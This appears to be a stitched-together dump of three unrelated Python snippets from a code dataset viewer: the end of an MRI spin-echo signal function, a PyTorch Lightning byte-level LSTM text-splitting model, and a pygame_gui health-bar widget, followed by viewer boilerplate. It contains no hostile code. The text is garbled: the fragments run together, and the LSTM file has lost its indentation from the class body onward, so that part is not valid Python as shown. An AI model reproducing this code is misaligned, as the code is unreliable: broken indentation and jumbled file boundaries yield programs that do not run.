    """
    Mxy, Mz = FSE_signal2_ex(angle_ex_rad, angles_rad, TE, T1, T2, B1=B1)
    # saturation-recovery factor for the remaining TR after the echo
    par = 1 - torch.exp(-(TR - TE)/T1)
    return Mxy * par.float(), Mz
|
from pathlib import Path
import numpy as np
from torch import nn
import torch
from torch.nn import functional as F
import pytorch_lightning as pl
from pytorch_lightning.trainer import Trainer
from sklearn.model_selection import train_test_split
from torch.utils import data
from dataset import SplitDataset
from argparse import ArgumentParser
from utils import postprocess
import json
class Network(pl.LightningModule):
ONNX_NAME = "model.onnx"
def __init__(self, text_dataset, labeler, hparams):
    """
    :param text_dataset: raw text dataset, split into samples by SplitDataset
    :param labeler: produces the split labels for each sample
    :param hparams: argparse namespace (see get_parser for the options)
    """
    super().__init__()
    self.text_dataset = text_dataset
    self.labeler = labeler
    # NOTE(review): assigning self.hparams directly is deprecated in recent
    # pytorch-lightning versions (save_hyperparameters) - presumably fine
    # for the version pinned here; confirm
    self.hparams = hparams
    # byte-level embedding: inputs are raw byte ids (0-255)
    self.embedding = nn.Embedding(256, 64)
    # halves the sequence length before the recurrent stack
    self.downsample = nn.Conv1d(64, 64, kernel_size=2, stride=2)
    self.lstm1 = nn.LSTM(64, 128, bidirectional=True, batch_first=True)
    self.lstm2 = nn.LSTM(256, 128, bidirectional=True, batch_first=True)
    self.lstm3 = nn.LSTM(256, 128, bidirectional=True, batch_first=True)
    # 2x outputs per downsampled step: forward() reshapes them back to the
    # full (undownsampled) sequence length
    self.out = nn.Linear(256, 2 * len(hparams.predict_indices))
def prepare_data(self):
    """Builds the split dataset and a fixed train/validation partition."""
    dataset = SplitDataset(
        self.text_dataset,
        self.labeler,
        # NOTE(review): positional magic numbers (500, 800, 20) - their
        # meaning is defined by SplitDataset; confirm and name them there
        500,
        800,
        20,
        return_indices=self.hparams.predict_indices,
    )
    # fixed random_state so the validation split is stable across runs
    train_indices, valid_indices = train_test_split(
        np.arange(len(dataset)), test_size=self.hparams.test_size, random_state=1234
    )
    self.train_dataset = data.Subset(dataset, train_indices)
    self.valid_dataset = data.Subset(dataset, valid_indices)
def forward(self, x):
    """
    :param x: byte ids, shape (batch, length) - assumes length is even so
        the downsample/reshape round-trip is exact (TODO confirm)
    :return: logits, shape (batch, length, len(predict_indices))
    """
    input_length = x.shape[1]
    h = self.embedding(x.long())
    # Conv1d expects (batch, channels, length); permute there and back
    h = self.downsample(h.permute(0, 2, 1)).permute(0, 2, 1)
    h, _ = self.lstm1(h)
    h, _ = self.lstm2(h)
    h, _ = self.lstm3(h)
    # the head emits 2 * n_labels values per downsampled step; reshaping
    # restores the original (pre-downsample) sequence length
    h = self.out(h).reshape(-1, input_length, len(self.hparams.predict_indices))
    return h
def loss(self, y_hat, y):
    """Weighted BCE-with-logits; per-level weights come from hparams."""
    level_count = len(self.hparams.level_weights)
    weight = (
        torch.tensor(self.hparams.level_weights)
        .view((1, 1, level_count))
        .to(y_hat.device)
    )
    # pos_weight=10 upweights the (rare) positive split labels
    return F.binary_cross_entropy_with_logits(
        y_hat, y.float(), pos_weight=torch.tensor(10.0), weight=weight
    )
def training_step(self, batch, batch_idx):
    """Single optimization step: forward pass, loss, tensorboard log."""
    inputs, targets = batch
    predictions = self.forward(inputs)
    step_loss = self.loss(predictions, targets)
    return {"loss": step_loss, "log": {"train_loss": step_loss}}
def validation_step(self, batch, batch_idx):
    """Computes val loss plus per-label tp/fp/fn counts for epoch-end F1."""
    x, y = batch
    y_hat = self.forward(x)
    val_loss = self.loss(y_hat, y)
    threshold = 0.5
    # NOTE(review): y_hat are raw logits (the loss uses
    # binary_cross_entropy_with_logits), so thresholding them at 0.5
    # corresponds to a probability of ~0.62, not 0.5 - confirm intended
    n_labels = y.shape[-1]
    # flatten batch and sequence dims; count per label column
    y_flat = y.view((-1, n_labels))
    pred_flat = y_hat.view((-1, n_labels)) > threshold
    tp = ((pred_flat == 1) & (y_flat == 1)).sum(dim=0)
    fp = ((pred_flat == 1) & (y_flat == 0)).sum(dim=0)
    fn = ((pred_flat == 0) & (y_flat == 1)).sum(dim=0)
    return {"val_loss": val_loss, "tp": tp, "fp": fp, "fn": fn}
def validation_epoch_end(self, outputs):
    """Aggregates val loss and prints per-label precision/recall/F1."""
    avg_loss = torch.stack([o["val_loss"] for o in outputs]).mean()
    eps = 1e-9
    totals = {
        key: torch.stack([o[key] for o in outputs]).sum(dim=0)
        for key in ("tp", "fp", "fn")
    }
    precision = totals["tp"] / (totals["tp"] + totals["fp"] + eps)
    recall = totals["tp"] / (totals["tp"] + totals["fn"] + eps)
    f1 = 2 * (precision * recall) / (precision + recall + eps)
    print()
    for p, r, f in zip(precision, recall, f1):
        print(f"f1={f:.3f}\tprecision={p:.3f}\trecall={r:.3f}")
    return {"avg_val_loss": avg_loss, "log": {"val_loss": avg_loss}}
def configure_optimizers(self):
adam = torch.optim.AdamW(self.parameters())
return [adam], []
def train_dataloader(self):
# define 1 epoch = n random samples from train data
# multiprocessing with spacy leaks memory so could go OOM without a sample limit
# reload_dataloaders_every_epoch must be True in trainer
# so that memory is cleaned up after each epoch
epoch_indices = np.random.choice(
np.arange(len(self.train_dataset)), self.hparams.train_size
)
epoch_sample = data.Subset(self.train_dataset, epoch_indices)
return data.DataLoader(
epoch_sample,
batch_size=self.hparams.batch_size,
shuffle=True,
num_workers=6,
collate_fn=SplitDataset.collate_fn,
)
def val_dataloader(self):
return data.DataLoader(
self.valid_dataset,
batch_size=256,
shuffle=False,
num_workers=6,
collate_fn=SplitDataset.collate_fn,
)
def store(self, directory, metadata):
store_directory = Path(directory)
store_directory.mkdir(exist_ok=True, parents=True)
sample = torch.zeros([1, 100], dtype=torch.int8)
model_path = store_directory / self.ONNX_NAME
torch.onnx.export(
self.float().cpu(),
sample.cpu(),
model_path,
input_names=["input"],
output_names=["output"],
dynamic_axes={
"input": {0: "batch", 1: "length"},
"output": {0: "batch", 1: "length"},
},
)
postprocess(
model_path,
metadata,
)
@staticmethod
def get_parser():
parser = ArgumentParser()
parser.add_argument(
"--test_size", type=int, help="Number of samples for test set."
)
parser.add_argument(
"--train_size",
type=int,
help="Number of samples to train on for one epoch. "
"Will be sampled without replacement from the text dataset.",
)
parser.add_argument(
"--predict_indices",
nargs="+",
type=int,
default=[],
help="Which levels of the splits to predict.",
)
parser.add_argument(
"--level_weights",
nargs="+",
type=float,
default=[],
help="Determines how much each level contributes to the loss. Must have the same length as the indices to predict.",
)
parser.add_argument(
"--batch_size",
type=int,
)
parser = Trainer.add_argparse_args(parser)
parser.set_defaults(
train_size=1_000_000,
test_size=50_000,
batch_size=128,
max_epochs=1,
reload_dataloaders_every_epoch=True,
)
return parser
|
from typing import Union, Dict
import pygame
from pygame_gui.core.interfaces import IContainerLikeInterface, IUIManagerInterface
from pygame_gui.core import UIElement
from pygame_gui.core.drawable_shapes import RectDrawableShape, RoundedRectangleShape
class UIWorldSpaceHealthBar(UIElement):
    """
    A UI that will display a sprite's 'health_capacity' and their 'current_health' in 'world space'
    above the sprite. This means that the health bar will move with the camera and the sprite
    itself.
    A sprite passed to this class must have the attributes 'health_capacity' and 'current_health'.
    :param relative_rect: The rectangle that defines the size of the health bar.
    :param sprite_to_monitor: The sprite we are displaying the health of.
    :param manager: The UIManager that manages this element.
    :param container: The container that this element is within. If set to None will be the root
                      window's container.
    :param parent_element: The element this element 'belongs to' in the theming hierarchy.
    :param object_id: A custom defined ID for fine tuning of theming.
    :param anchors: A dictionary describing what this element's relative_rect is relative to.
    """
    class ExampleHealthSprite(pygame.sprite.Sprite):
        """
        An example sprite with health instance attributes.
        :param groups: Sprite groups to put the sprite in.
        """
        def __init__(self, *groups):
            super().__init__(*groups)
            # Fixed demo values: half health out of a capacity of 100.
            self.current_health = 50
            self.health_capacity = 100
            self.rect = pygame.Rect(0, 0, 32, 64)
    def __init__(self,
                 relative_rect: pygame.Rect,
                 sprite_to_monitor: Union[pygame.sprite.Sprite, ExampleHealthSprite],
                 manager: IUIManagerInterface,
                 container: Union[IContainerLikeInterface, None] = None,
                 parent_element: Union[UIElement, None] = None,
                 object_id: Union[str, None] = None,
                 anchors: Union[Dict[str, str], None] = None):
        super().__init__(relative_rect, manager, container,
                         starting_height=1,
                         layer_thickness=1,
                         anchors=anchors)
        self._create_valid_ids(container=container,
                               parent_element=parent_element,
                               object_id=object_id,
                               element_id='world_space_health_bar')
        # Validate the monitored sprite up front: it must expose both health
        # attributes read by rebuild()/update() below.
        if sprite_to_monitor is not None:
            if not hasattr(sprite_to_monitor, 'health_capacity'):
                raise AttributeError('Sprite does not have health_capacity attribute')
            if not hasattr(sprite_to_monitor, 'current_health'):
                raise AttributeError('Sprite does not have current_health attribute')
            self.sprite_to_monitor = sprite_to_monitor
        else:
            # NOTE(review): this assignment is dead code -- the raise on the
            # next line always fires when no sprite is supplied. Also note an
            # AssertionError (not ValueError/TypeError) is the documented-by-use
            # exception type here; callers may depend on it.
            self.sprite_to_monitor = None
            raise AssertionError('Need sprite to monitor')
        # Cache the monitored values so update() can detect changes cheaply.
        self.current_health = self.sprite_to_monitor.current_health
        self.health_capacity = self.sprite_to_monitor.health_capacity
        self.health_percentage = self.current_health / self.health_capacity
        # All theming/layout attributes below are populated by
        # rebuild_from_changed_theme_data() (called at the end of __init__),
        # which in turn calls rebuild() to compute the geometry.
        self.border_colour = None
        self.health_empty_colour = None
        self.bar_filled_colour = None
        self.bar_unfilled_colour = None
        self.health_colour = None
        self.hover_height = None
        self.border_width = None
        self.shadow_width = None
        self.position = None
        self.border_rect = None
        self.capacity_width = None
        self.capacity_height = None
        self.health_capacity_rect = None
        self.current_health_rect = None
        self.drawable_shape = None
        self.shape = 'rectangle'
        self.shape_corner_radius = None
        self.set_image(None)
        self.rebuild_from_changed_theme_data()
    def rebuild(self):
        """
        Rebuild the health bar entirely because the theming data has changed.
        """
        # Position the bar hover_height pixels above the monitored sprite.
        self.position = [self.sprite_to_monitor.rect.x,
                         self.sprite_to_monitor.rect.y - self.hover_height]
        self.rect.x = self.position[0]
        self.rect.y = self.position[1]
        # Nesting, outermost to innermost: shadow -> border -> capacity bar.
        self.border_rect = pygame.Rect((self.shadow_width, self.shadow_width),
                                       (self.rect.width - (self.shadow_width * 2),
                                        self.rect.height - (self.shadow_width * 2)))
        self.capacity_width = self.rect.width - (self.shadow_width * 2) - (self.border_width * 2)
        self.capacity_height = self.rect.height - (self.shadow_width * 2) - (self.border_width * 2)
        self.health_capacity_rect = pygame.Rect((self.border_width + self.shadow_width,
                                                 self.border_width + self.shadow_width),
                                                (self.capacity_width, self.capacity_height))
        # The filled portion shares the capacity rect's origin; its width is
        # scaled by the current health percentage.
        self.current_health_rect = pygame.Rect((self.border_width + self.shadow_width,
                                                self.border_width + self.shadow_width),
                                               (int(self.capacity_width * self.health_percentage),
                                                self.capacity_height))
        self.redraw()
    def update(self, time_delta: float):
        """
        Updates the health bar sprite's image and rectangle with the latest health and position
        data from the sprite we are monitoring
        :param time_delta: time passed in seconds between one call to this method and the next.
        """
        super().update(time_delta)
        if self.alive():
            # Follow the monitored sprite's position every frame.
            self.position = [self.sprite_to_monitor.rect.x,
                             self.sprite_to_monitor.rect.y - self.hover_height]
            self.rect.x = self.position[0]
            self.rect.y = self.position[1]
            self.relative_rect.topleft = self.rect.topleft
            # Only redraw when the monitored health values actually changed.
            if (self.current_health != self.sprite_to_monitor.current_health) or (
                    self.health_capacity != self.sprite_to_monitor.health_capacity):
                self.current_health = self.sprite_to_monitor.current_health
                self.health_capacity = self.sprite_to_monitor.health_capacity
                self.health_percentage = self.current_health / self.health_capacity
                self.redraw()
    def redraw(self):
        """
        Redraw the health bar when something, other than it's position has changed.
        """
        self.current_health_rect.width = int(self.capacity_width * self.health_percentage)
        # filled_bar_width_percentage drives how much of the bar the drawable
        # shape renders as filled.
        theming_parameters = {'normal_bg': self.bar_unfilled_colour,
                              'normal_border': self.border_colour,
                              'border_width': self.border_width,
                              'shadow_width': self.shadow_width,
                              'shape_corner_radius': self.shape_corner_radius,
                              'filled_bar': self.bar_filled_colour,
                              'filled_bar_width_percentage': self.health_percentage}
        if self.shape == 'rectangle':
            self.drawable_shape = RectDrawableShape(self.rect, theming_parameters,
                                                    ['normal'], self.ui_manager)
        elif self.shape == 'rounded_rectangle':
            self.drawable_shape = RoundedRectangleShape(self.rect, theming_parameters,
                                                        ['normal'], self.ui_manager)
        self.set_image(self.drawable_shape.get_surface('normal'))
    def rebuild_from_changed_theme_data(self):
        """
        Called by the UIManager to check the theming data and rebuild whatever needs rebuilding
        for this element when the theme data has changed.
        """
        super().rebuild_from_changed_theme_data()
        # Track whether any theming value changed so we only rebuild once.
        has_any_changed = False
        if self._check_misc_theme_data_changed(attribute_name='shape',
                                               default_value='rectangle',
                                               casting_func=str,
                                               allowed_values=['rectangle',
                                                               'rounded_rectangle']):
            has_any_changed = True
        if self._check_shape_theming_changed(defaults={'border_width': 1,
                                                       'shadow_width': 2,
                                                       'shape_corner_radius': 2}):
            has_any_changed = True
        if self._check_misc_theme_data_changed(attribute_name='hover_height',
                                               default_value=1,
                                               casting_func=int):
            has_any_changed = True
        border_colour = self.ui_theme.get_colour_or_gradient('normal_border',
                                                             self.combined_element_ids)
        if border_colour != self.border_colour:
            self.border_colour = border_colour
            has_any_changed = True
        bar_unfilled_colour = self.ui_theme.get_colour_or_gradient('unfilled_bar',
                                                                   self.combined_element_ids)
        if bar_unfilled_colour != self.bar_unfilled_colour:
            self.bar_unfilled_colour = bar_unfilled_colour
            has_any_changed = True
        bar_filled_colour = self.ui_theme.get_colour_or_gradient('filled_bar',
                                                                 self.combined_element_ids)
        if bar_filled_colour != self.bar_filled_colour:
            self.bar_filled_colour = bar_filled_colour
            has_any_changed = True
        if has_any_changed:
            self.rebuild()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.